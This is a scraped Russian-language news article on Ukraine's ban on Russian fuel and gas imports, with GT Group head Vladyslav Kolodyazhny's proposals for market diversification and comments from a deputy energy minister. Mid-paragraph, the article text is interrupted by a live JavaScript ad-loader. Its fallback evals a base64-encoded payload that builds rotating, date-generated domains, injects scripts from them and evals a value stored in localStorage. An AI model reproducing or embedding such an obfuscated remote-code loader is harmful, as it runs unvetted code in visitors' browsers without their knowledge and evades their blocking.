Газтрон Украина (GT Group): запрет импорта российского газа — это первый шаг к диверсификации рынка и энергетической независимости Украины

Владислав Колодяжный, глава компании GT Group (Газтрон Украина), считает, что решение Кабинета Министров Украины о запрете импорта российского сжиженного газа является первым шагом в энергетической войне и важным шагом к диверсификации рынка и обеспечению энергетической независимости Украины. Соответствующие изменения были приняты в Постановлении № 1147 «О запрете ввоза на таможенную территорию Украины товаров, происходящих из Российской Федерации». Запрет касается различных видов топлива, таких как нефть, нефтепродукты, отработанные нефтепродукты, газы нефтяные и другие углеводороды в газообразном состоянии, альтернативное моторное топливо, биодизель и их смеси.

На своей странице в Facebook Колодяжный отмечает, что, несмотря на это решение, участникам газового рынка стоит проделать еще много работы. Поэтому эксперт предложил алгоритм действий, который позволит Украине быстрее выстроить независимый газовый рынок.

По его словам, следует расширить перечень наименований тех товаров, которые запрещено ввозить в Украину из рф. Более того, нужно запретить импорт продукции не только из россии, но и из тех стран, которые оказывают активную поддержку государству-агрессору. Также важно уточнить процедуру проверки происхождения топлива и признать сертификат происхождения основным документом, подтверждающим страну происхождения продукции.

Кроме того, необходимо создать мониторинговую комиссию, в которую будут входить представители министерств, ассоциаций и участников рынка. Члены комиссии будут оценивать эффективность принятых мер и корректировать их в соответствии с новыми вызовами.

Важным шагом также является содействие развитию инфраструктуры для перегрузки и хранения сжиженного нефтяного газа. Для этого следует построить европейскую колею шириной 1435 мм и придерживаться стандартов хранения нефти и нефтепродуктов, действующих в Европе. Также, по мнению Колодяжного, следует рассмотреть опцию дерегулирования строительных процедур и процедур присоединения к внешним сетям.

Эксперт также считает, что Украине следует установить такое налогообложение для нефтепродуктов, которое будет соответствовать европейскому законодательству. Он отмечает, что эти правила налогообложения должны быть стабильными в течение некоторого времени, чтобы инфраструктурные проекты стали более привлекательными для инвесторов. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

В контексте получения лицензии на хранение и производство топлива, Украина должна ориентироваться на Польшу, подчеркивает Владислав Колодяжный. Ведь там лицензии довольно дорогие, но их можно относительно легко получить, что значительно снижает коррупционные риски.

«Это война. Только энергетическая. Где надо на меры отвечать стремительными контрмерами», — заявляет глава компании GT Group.

Напомним, что ранее российское топливо завозилось в Украину преимущественно без сертификата, то есть как ресурс неопределенного происхождения. Об этом на своей странице в Facebook написал заместитель министра энергетики Украины Николай Колесник. К тому же, по его словам, российский ресурс был значительно доступнее в контексте цен, а потому развитие альтернативных маршрутов поставки топлива было невыгодным, хотя участники рынка и продолжали их выстраивать в прошлом году.

«Это вызывало значительный риск дестабилизации топливного рынка», — подчеркнул он.

Однако сейчас украинский рынок получил шанс стать более энергонезависимым. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/gaztron-ukraina-gt-group-zapret-importa-rossijskogo-gaza-eto-pervyj-shag-k-diversifikatsii-rynka-i-energeticheskoj-nezavisimosti-ukrainy/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top